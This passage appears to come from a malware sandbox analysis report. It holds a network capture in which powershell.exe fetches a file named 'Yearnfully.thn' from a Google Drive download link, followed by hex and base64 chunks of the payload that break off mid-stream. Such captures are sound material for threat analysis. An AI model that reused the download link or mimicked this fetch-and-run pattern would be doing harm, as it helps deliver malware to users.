Oct 1, 2024 15:52:51.916049004 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.916062117 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.916187048 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.918255091 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.918325901 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.918339014 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.918401003 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.920238018 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.920285940 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.920299053 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.920346022 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.922486067 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.922542095 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.922554016 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.922602892 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.924822092 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.924884081 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.924896955 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.924943924 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.926915884 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.926983118 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.926996946 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.927083969 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.929059029 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.929116964 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.929130077 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.929183960 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.931457996 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.931514025 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.931526899 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.931586981 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.933265924 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.933322906 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.933335066 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.933393955 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.935460091 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.935513020 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.935525894 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.935631990 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.937433004 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.937482119 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.937606096 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.937690020 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.939533949 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.939580917 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.939594030 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.939640045 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.941483974 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.941555023 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.941606045 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.941606045 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.941625118 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.941673040 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.943442106 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.943557024 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.943569899 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.943649054 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.945270061 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.945533037 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.945544958 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.945590019 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.947138071 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.947860003 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.947871923 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.947946072 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.949009895 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.950840950 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.950854063 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.950908899 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.950928926 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.951037884 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.951050997 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.951126099 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.952754021 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.952800035 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.952811956 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.952878952 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.954471111 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.954520941 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.954531908 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.954581022 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.956374884 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.956428051 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.956440926 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.956487894 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.958148956 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.958225012 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.958236933 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.958298922 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.959963083 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.960072994 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.960086107 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.960166931 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.961709023 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.961754084 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.961791039 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.961833000 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.963390112 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.963445902 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.963459015 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.963510990 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.965140104 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.965187073 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.965198994 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.965246916 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.966861963 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.966926098 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.966938972 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.966984034 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.968818903 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.968874931 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.968888998 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.968966007 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.970223904 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.970282078 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.970573902 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.970618963 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.971975088 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.972026110 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.972038031 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.972084999 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.973757982 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.973808050 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.973819971 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.973915100 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.974111080 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.974153996 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.974168062 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.974210978 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.977164984 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.977212906 CEST	443	49716	142.250.184.193	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 15:52:01.210556984 CEST	58561	53	192.168.2.5	1.1.1.1
Oct 1, 2024 15:52:01.218357086 CEST	53	58561	1.1.1.1	192.168.2.5
Oct 1, 2024 15:52:02.386835098 CEST	56018	53	192.168.2.5	1.1.1.1
Oct 1, 2024 15:52:02.395282030 CEST	53	56018	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 15:52:01.210556984 CEST	192.168.2.5	1.1.1.1	0x9982	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:52:02.386835098 CEST	192.168.2.5	1.1.1.1	0x1f6	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 15:52:01.218357086 CEST	1.1.1.1	192.168.2.5	0x9982	No error (0)	drive.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:52:02.395282030 CEST	1.1.1.1	192.168.2.5	0x1f6	No error (0)	drive.usercontent.google.com		142.250.184.193	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	216.58.206.78	443	1900	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 13:52:02 UTC	215	OUT	GET /uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
2024-10-01 13:52:02 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 01 Oct 2024 13:52:02 GMT Location: https://drive.usercontent.google.com/download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-z6VIXgdZ6wpMvYSQ-3nbvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	142.250.184.193	443	1900	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 13:52:03 UTC	233	OUT	GET /download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	216.58.206.78	443	1900	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 13:52:08 UTC	121	OUT	GET /uc?export=download&id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R HTTP/1.1 Host: drive.google.com Connection: Keep-Alive
2024-10-01 13:52:08 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 01 Oct 2024 13:52:08 GMT Location: https://drive.usercontent.google.com/download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-bCrRPJr9zWS1jY1ElxQaYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	142.250.184.193	443	1900	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 13:52:09 UTC	139	OUT	GET /download?id=10mSdA58tHFD2BourB_wMxlvC-LJjwr4R&export=download HTTP/1.1 Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-01 13:52:11 UTC	4854	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="Yearnfully.thn" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 408184 Last-Modified: Tue, 01 Oct 2024 13:01:17 GMT X-GUploader-UploadID: AD-8ljuH3EyR3feYZnvzpnIj8AZfBsykS0tf4pG7IhM9OVN4hIfn-Qf4LlS9mDkYZYSqDKYe08Pm88aUoQ Date: Tue, 01 Oct 2024 13:52:11 GMT Expires: Tue, 01 Oct 2024 13:52:11 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=KnWRUA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-01 13:52:11 UTC	4854	IN	Data Raw: 36 77 4a 56 42 33 45 42 6d 37 75 59 58 77 73 41 63 51 47 62 36 77 4b 74 6a 67 4e 63 4a 41 54 72 41 6a 50 62 63 51 47 62 75 54 55 4a 43 39 72 72 41 75 55 61 36 77 4a 79 33 6f 48 78 67 47 6a 50 76 65 73 43 72 68 64 78 41 5a 75 42 38 62 56 68 78 47 66 72 41 6c 4e 67 63 51 47 62 36 77 4b 47 31 4f 73 43 37 75 32 36 36 41 64 45 79 75 73 43 4b 61 31 78 41 5a 74 78 41 5a 74 78 41 5a 73 78 79 75 73 43 50 66 7a 72 41 70 35 58 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4c 72 41 76 6b 68 36 77 4b 69 71 34 50 42 42 4f 73 43 54 32 2f 72 41 70 30 33 67 66 6b 6f 6b 2b 38 42 66 4d 70 78 41 5a 76 72 41 6d 38 51 69 30 51 6b 42 4f 73 43 6d 72 72 72 41 72 5a 62 69 63 4e 78 41 5a 76 72 41 76 48 43 67 63 4e 45 2f 66 6b 41 63 51 47 62 63 51 47 62 75 71 30 58 43 5a 31 78 41 5a 74 Data Ascii: 6wJVB3EBm7uYXwsAcQGb6wKtjgNcJATrAjPbcQGbuTUJC9rrAuUa6wJy3oHxgGjPvesCrhdxAZuB8bVhxGfrAlNgcQGb6wKG1OsC7u266AdEyusCKa1xAZtxAZtxAZsxyusCPfzrAp5XiRQLcQGbcQGb0eLrAvkh6wKiq4PBBOsCT2/rAp03gfkok+8BfMpxAZvrAm8Qi0QkBOsCmrrrArZbicNxAZvrAvHCgcNE/fkAcQGbcQGbuq0XCZ1xAZt
2024-10-01 13:52:11 UTC	4854	IN	Data Raw: 68 38 4e 71 78 64 4c 39 70 55 47 62 53 52 6a 74 31 73 53 77 62 6b 31 34 38 4b 4b 64 7a 79 43 52 44 69 31 4b 6d 4e 30 44 62 55 64 70 6c 35 6f 61 4a 54 6b 6d 54 42 62 47 36 30 45 6e 44 31 6f 75 4d 4f 31 4c 47 4e 47 58 73 74 34 5a 6c 68 6f 54 6a 45 6d 56 4f 6d 47 57 4c 44 71 52 68 56 68 61 6e 36 73 41 39 63 50 4c 56 33 75 64 43 77 73 4c 64 55 49 34 67 34 33 33 4e 50 2b 6a 78 68 4d 72 41 4d 49 65 54 64 38 36 50 59 32 79 57 48 62 63 75 71 4e 42 47 37 69 4e 53 42 6a 66 31 2f 56 4e 35 4b 37 36 74 51 4b 62 49 45 57 35 67 34 43 78 57 5a 70 78 51 4e 4e 5a 67 45 57 36 37 39 2f 47 4f 5a 6c 2f 4c 42 44 50 62 57 4e 5a 47 32 6a 4c 71 46 62 56 62 62 48 75 46 78 76 61 79 42 6e 6e 44 66 70 49 6a 46 4c 48 55 45 32 59 4d 2f 51 69 62 69 70 67 52 53 31 41 37 2f 35 30 4e 73 56 Data Ascii: h8NqxdL9pUGbSRjt1sSwbk148KKdzyCRDi1KmN0DbUdpl5oaJTkmTBbG60EnD1ouMO1LGNGXst4ZlhoTjEmVOmGWLDqRhVhan6sA9cPLV3udCwsLdUI4g433NP+jxhMrAMIeTd86PY2yWHbcuqNBG7iNSBjf1/VN5K76tQKbIEW5g4CxWZpxQNNZgEW679/GOZl/LBDPbWNZG2jLqFbVbbHuFxvayBnnDfpIjFLHUE2YM/QibipgRS1A7/50NsV
2024-10-01 13:52:11 UTC	138	IN	Data Raw: 6f 50 63 2f 41 66 78 4a 7a 73 36 6d 4e 33 47 74 30 32 4e 64 42 2b 76 36 6d 37 31 37 72 2f 5a 6a 73 5a 58 76 2b 53 5a 55 6c 52 37 6c 51 33 63 7a 32 6d 44 65 5a 61 36 4e 46 69 49 38 4f 6a 39 65 33 77 6f 39 59 57 34 4b 34 79 6a 69 42 4f 66 79 6b 78 44 42 2b 4b 47 4b 51 68 58 62 31 48 54 56 70 66 5a 76 4b 4f 6b 54 4d 6c 4e 7a 31 47 77 71 42 37 44 48 49 42 6b 51 54 69 44 51 6f 6f 70 72 30 6f 31 37 6a 2f 66 43 55 4f Data Ascii: oPc/AfxJzs6mN3Gt02NdB+v6m717r/ZjsZXv+SZUlR7lQ3cz2mDeZa6NFiI8Oj9e3wo9YW4K4yjiBOfykxDB+KGKQhXb1HTVpfZvKOkTMlNz1GwqB7DHIBkQTiDQoopr0o17j/fCUO
2024-10-01 13:52:11 UTC	1321	IN	Data Raw: 6f 6c 4c 42 57 75 55 72 4d 35 58 79 34 4d 53 54 72 71 53 58 62 4a 49 6a 39 6a 55 63 37 5a 4f 72 47 79 55 2b 51 34 42 70 7a 37 35 52 52 6a 6f 45 43 61 42 70 78 61 59 41 45 64 4d 6b 79 54 33 37 73 75 76 38 56 6c 31 35 36 48 6b 78 58 46 66 69 54 70 43 41 6c 63 5a 54 5a 6c 59 52 2b 6d 52 43 39 54 53 42 69 65 77 4e 38 36 5a 4d 2b 4e 56 44 65 5a 62 58 4c 7a 34 5a 50 77 42 35 67 74 67 52 46 74 2f 55 6e 6f 72 35 2b 50 7a 74 35 75 53 6c 35 76 6e 41 36 4b 6c 34 77 38 77 6e 68 43 53 47 45 46 46 51 46 4c 57 77 41 78 45 63 57 68 62 45 32 36 6a 32 37 5a 46 64 58 39 6f 4e 74 61 41 4e 37 6e 71 6e 6f 69 68 58 32 45 71 52 6a 63 33 61 7a 66 46 6f 6d 72 47 46 57 46 2b 4b 45 77 4c 6c 47 6b 31 48 51 34 30 39 4c 35 4b 50 47 68 32 74 62 59 42 52 6b 67 2b 46 53 4e 4e 43 47 61 39 Data Ascii: olLBWuUrM5Xy4MSTrqSXbJIj9jUc7ZOrGyU+Q4Bpz75RRjoECaBpxaYAEdMkyT37suv8Vl156HkxXFfiTpCAlcZTZlYR+mRC9TSBiewN86ZM+NVDeZbXLz4ZPwB5gtgRFt/Unor5+Pzt5uSl5vnA6Kl4w8wnhCSGEFFQFLWwAxEcWhbE26j27ZFdX9oNtaAN7nqnoihX2EqRjc3azfFomrGFWF+KEwLlGk1HQ409L5KPGh2tbYBRkg+FSNNCGa9
2024-10-01 13:52:11 UTC	1390	IN	Data Raw: 6c 72 56 41 61 42 45 59 34 52 49 73 56 53 4d 6b 4d 53 52 46 74 47 4d 2b 64 69 76 57 37 31 31 43 66 34 6a 57 45 32 6c 30 5a 4e 6e 54 4d 4b 42 4f 79 39 4f 57 62 4c 58 66 4f 6f 51 65 53 46 6a 73 48 53 4c 67 52 31 43 4f 46 75 62 31 55 51 4e 46 4d 39 70 6c 68 6f 56 36 6f 56 42 76 35 6f 4d 75 74 68 4d 42 67 6f 46 51 36 69 61 67 53 7a 46 71 42 2b 49 54 63 5a 4b 67 5a 79 41 42 6a 59 6c 69 79 73 32 39 58 44 4f 53 72 6d 72 54 6f 6e 71 39 42 41 38 4d 66 38 79 52 38 46 41 32 65 30 6d 57 55 48 49 41 79 65 70 48 42 44 4c 78 71 51 4e 53 78 6a 5a 6e 64 73 65 57 5a 59 61 48 55 44 61 71 39 77 63 4a 51 65 61 4c 55 4b 32 58 31 46 55 35 78 5a 62 2b 6a 67 33 78 32 45 32 6d 30 4b 64 47 44 70 68 68 32 2b 5a 77 37 63 47 43 67 52 6e 6e 42 53 35 78 54 6a 4c 48 7a 74 41 53 46 50 41 Data Ascii: lrVAaBEY4RIsVSMkMSRFtGM+divW711Cf4jWE2l0ZNnTMKBOy9OWbLXfOoQeSFjsHSLgR1COFub1UQNFM9plhoV6oVBv5oMuthMBgoFQ6iagSzFqB+ITcZKgZyABjYliys29XDOSrmrTonq9BA8Mf8yR8FA2e0mWUHIAyepHBDLxqQNSxjZndseWZYaHUDaq9wcJQeaLUK2X1FU5xZb+jg3x2E2m0KdGDphh2+Zw7cGCgRnnBS5xTjLHztASFPA
2024-10-01 13:52:11 UTC	1390	IN	Data Raw: 4e 52 45 72 76 46 2f 67 53 6a 78 4d 66 43 4c 76 77 55 5a 49 50 68 63 6a 54 53 64 70 50 47 37 31 64 71 52 55 62 6b 6d 58 6c 6f 4b 52 42 38 6d 41 42 33 77 39 65 50 4b 44 79 2b 35 2f 51 30 4f 77 75 6f 30 67 47 43 55 35 4b 68 49 4d 77 42 6f 51 4e 46 64 38 4a 48 6f 55 4b 67 59 56 51 78 32 53 75 2f 59 77 30 72 46 42 46 75 49 2f 6f 72 46 6d 5a 66 46 4f 6d 56 64 42 45 4f 33 4f 56 2b 74 6b 57 65 65 7a 6a 64 78 39 75 6e 42 74 7a 6a 79 75 2f 54 64 6c 64 58 76 34 4d 2b 30 6e 31 46 65 38 51 2f 42 30 7a 53 2f 53 69 50 58 6c 75 43 68 64 4c 77 38 51 50 33 68 37 4a 71 73 43 4d 6f 59 4f 76 44 66 2f 6b 6a 74 6a 44 45 34 68 6f 42 63 34 30 74 79 6e 44 4f 50 51 41 34 64 49 70 32 76 69 74 79 56 33 41 44 51 57 43 4a 50 43 6b 69 6e 4b 53 48 2f 59 73 2f 43 62 38 35 4a 4a 72 58 5a Data Ascii: 